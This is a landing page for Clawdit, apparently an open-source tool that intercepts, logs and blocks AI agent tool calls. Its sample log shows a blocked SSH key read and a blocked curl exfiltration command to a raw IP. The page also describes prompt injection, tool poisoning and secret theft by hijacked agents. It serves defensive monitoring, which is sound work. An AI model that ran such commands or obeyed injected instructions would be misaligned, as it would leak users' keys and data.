Open source · Local-first · Zero infrastructure

See what your AI agent really did.

Clawdit is an open-source runtime security tool that intercepts, logs, and enforces policies on every tool call your AI agent makes. The black box recorder for the agentic era.

Join the Waitlist See How It Works

$ clawdit watch

[clawdit] intercepting agent tool calls...

ALLOW read_file → /project/src/index.ts

ALLOW web_search → "react hook patterns"

BLOCK read_file → ~/.ssh/id_rsa

FLAG api_call → response contains API key pattern

BLOCK shell_exec → curl http://91.92.242.30/exfil

AUDIT 3 blocked · 1 flagged · 47 allowed · session: 12m

$ clawdit report --format html

Done → audit-report-2026-02-17.html

// the problem

Your agents have full system access.
You have zero visibility.

AI agents can read your files, call APIs, execute code, and access secrets. When something goes wrong, there's no audit trail, no policy enforcement, and no way to replay what happened.

82%

of MCP servers have path traversal flaws

Endor Labs found that 82% of 2,614 MCP server implementations have file system operations prone to path traversal. Your agent's tools are the attack surface.

84.2%

tool poisoning attack success rate

Hidden instructions in MCP tool descriptions succeed 84.2% of the time when agents have auto-approval enabled. Scanners can't catch what happens at runtime.

open-source runtime firewalls exist

Every runtime protection solution is commercial and enterprise-only. Developers and hackers have no open-source tool to enforce policies on agent tool calls in real time.

// how it works

One binary. Zero config. Full visibility.

Install in seconds

Single binary, no dependencies. Works on macOS, Linux, Windows. No cloud account, no API keys, no infrastructure.

brew install clawdit

Intercept every tool call

Clawdit sits between your agent and its tools as a transparent proxy. It captures every request, response, and decision chain — locally on your machine.

clawdit watch

Enforce policies with YAML rules

Write declarative rules: block SSH key access, flag secret leaks, rate-limit tool calls. Ship with sensible defaults. Contribute rules to the community.

clawdit scan --rules owasp-agents

Query and report

Search your audit log by date, tool, agent, or anomaly. Export compliance reports that map directly to OWASP and AIUC-1 requirements.

clawdit report --format html

// what clawdit catches

Runtime threats that scanners miss.

⚠

Prompt injection at runtime

Agent gets hijacked mid-session by hidden instructions in tool responses, emails, or documents. Clawdit detects the behavioral deviation and blocks it.

🔒

Secret exfiltration

Agent reads ~/.ssh, .env, or API keys and tries to send them outbound. Policy rules catch the pattern and block the call before data leaves your machine.

📈

Anomalous behavior

Agent calls fetch_customer_records 500 times in 2 minutes. Baseline is 5/hour. Clawdit flags the spike and auto-throttles before damage is done.

🔗

Tool poisoning & rug pulls

MCP tool descriptions change after approval, or chain clean tools into malicious sequences. Clawdit monitors tool schemas and blocks unauthorized changes.

// roadmap

Here's what's coming.

Built in public. Designed for contributors.

NOW

Phase 1 — Local CLI Building now

Single binary installs via brew or go install. Intercepts agent tool calls, logs everything to local SQLite, provides a query interface and HTML audit report generator. Works with any agent framework. No server, no cloud, no account.

Phase 2 — Observability Dashboard Q2 2026

MCP proxy mode with full transport interception. YAML policy engine with community-contributed detection rules. Real-time anomaly detection and alerting. Self-hosted dashboard for visualizing agent behavior across sessions.

LATER

Phase 3 — Enterprise Compliance H2 2026

AIUC-1 and OWASP compliance report mapping. Centralized log aggregation for teams. SIEM integrations (Datadog, Splunk, Sentinel). Tamper-proof audit trails with cryptographic signing. SSO and RBAC for enterprise deployments.